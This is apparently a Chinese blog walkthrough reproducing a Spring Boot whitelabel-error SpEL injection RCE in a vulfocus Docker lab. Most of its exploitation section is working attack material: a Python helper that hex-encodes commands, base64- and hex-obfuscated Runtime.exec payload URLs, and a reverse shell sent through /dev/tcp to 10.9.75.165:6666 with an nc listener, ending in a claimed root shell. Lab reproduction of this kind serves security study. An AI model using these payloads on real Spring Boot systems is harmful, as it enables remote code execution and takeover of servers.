漏洞反序列化复现"/>
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
文章目录
- SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
- 1 在线漏洞靶场环境
- 1.1 漏洞原理
- 2 环境搭建
- 2.1 使用命令拉取靶场
- 2.2 查看拉取的镜像资源
- docker容器的相关操作
- 2.4 启动访问页面`:9001/`
- 3 漏洞复现
- 3.1 输入 /article?id=${66}
- 4 漏洞利用
- 4.1 编写反弹shell脚本-创建文件
- 4.1.1 先用指令创建一个文件
- 4.1.2编写指令转16进制编码,使用python脚本,文件名为1.py
- 4.1.3编写指令转16进制编码,使用python脚本,文件名为1.py
- 4.1.4回车执行页面返回报错提示【java.lang.UNIXProcess@50353b7】
- 4.1.5进入容器:文件创建成功,验证可以执行shell脚本
- 4.2 编写反弹shell脚本
- 4.3 浏览器执行反弹shell
- 4.4 反弹成功,获取root
1 在线漏洞靶场环境
1.1 漏洞原理
1spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中2此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞。
2 环境搭建
2.1 使用命令拉取靶场
docker pull vulfocus/spring-boot_whitelabel_spel:latest
2.2 查看拉取的镜像资源
┌──(kali💋kali)-[/var/lib/docker]
└─$ sudo docker images
docker容器的相关操作
sudo docker images # 查询镜像源相关路径sudo docker exec -it <container_name_or_id> /bin/bash # 进入具体容器中(查看具体容器程序的端口号是9090)sudo docker run -d -p 9001:9090 vulfocus/spring-boot_whitelabel_spel sudo docker ps -a # 查看所有的镜像状态sudo docker inspect <container_name_or_id> # 查看docker容器详细信息sudo docker stop f30 #结束容器服务,f30是docker容器id的缩写
2.4 启动访问页面:9001/
3 漏洞复现
3.1 输入 /article?id=${66}
输入 /article?id=${66} ,如果发现报错页面将 66显示在报错页面上,基本可以确定目标存在 SpEL 表达式注入漏洞。
4 漏洞利用
4.1 编写反弹shell脚本-创建文件
4.1.1 先用指令创建一个文件
touch /tmp/success1 # 创建文件指令bash -c {echo,dG91Y2ggL3RtcC9zdWNjZXNzMQ==}|{base64,-d}|{bash,-i} #将指令编译成base64
4.1.2编写指令转16进制编码,使用python脚本,文件名为1.py
result = ""
target = 'bash -c {echo,dG91Y2ggL3RtcC9zdWNjZXNzMQ==}|{base64,-d}|{bash,-i}'
for x in target:result += hex(ord(x)) + ","
print(result.rstrip(','))
4.1.3编写指令转16进制编码,使用python脚本,文件名为1.py
===========1.编译后============
0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x64,0x47,0x39,0x31,0x59,0x32,0x67,0x67,0x4c,0x33,0x52,0x74,0x63,0x43,0x39,0x7a,0x64,0x57,0x4e,0x6a,0x5a,0x58,0x4e,0x7a,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d===========2.将编译后的16进制复制到下面的new%20byte[]{16进制码}======/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{}))}==============3.最终组合为=============== /article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x64,0x47,0x39,0x31,0x59,0x32,0x67,0x67,0x4c,0x33,0x52,0x74,0x63,0x43,0x39,0x7a,0x64,0x57,0x4e,0x6a,0x5a,0x58,0x4e,0x7a,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}
4.1.4回车执行页面返回报错提示【java.lang.UNIXProcess@50353b7】
4.1.5进入容器:文件创建成功,验证可以执行shell脚本
4.2 编写反弹shell脚本
============1.反弹shell脚本=============nc -lvp 6666 # l是监听模式;v是显示详细信息;p是指定端口;bash -i &>/dev/tcp/10.9.75.165/6666 0<&1 # 反弹交互指令tcp服务==============2. 反弹shell脚本转base64编码=============bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC45Ljc1LjE2NS82NjY2IDA8JjE=}|{base64,-d}|{bash,-i}===============3.反弹shell转换成16进制编码==========0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x6d,0x50,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4d,0x43,0x34,0x35,0x4c,0x6a,0x63,0x31,0x4c,0x6a,0x45,0x32,0x4e,0x53,0x38,0x32,0x4e,0x6a,0x59,0x32,0x49,0x44,0x41,0x38,0x4a,0x6a,0x45,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d==========4.将编译后的16进制复制到下面的new%20byte[]{16进制码}======/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{}))}==============5.最终组合为===============
/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x6d,0x50,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4d,0x43,0x34,0x35,0x4c,0x6a,0x63,0x31,0x4c,0x6a,0x45,0x32,0x4e,0x53,0x38,0x32,0x4e,0x6a,0x59,0x32,0x49,0x44,0x41,0x38,0x4a,0x6a,0x45,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}
4.3 浏览器执行反弹shell
4.4 反弹成功,获取root
更多推荐
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
发布评论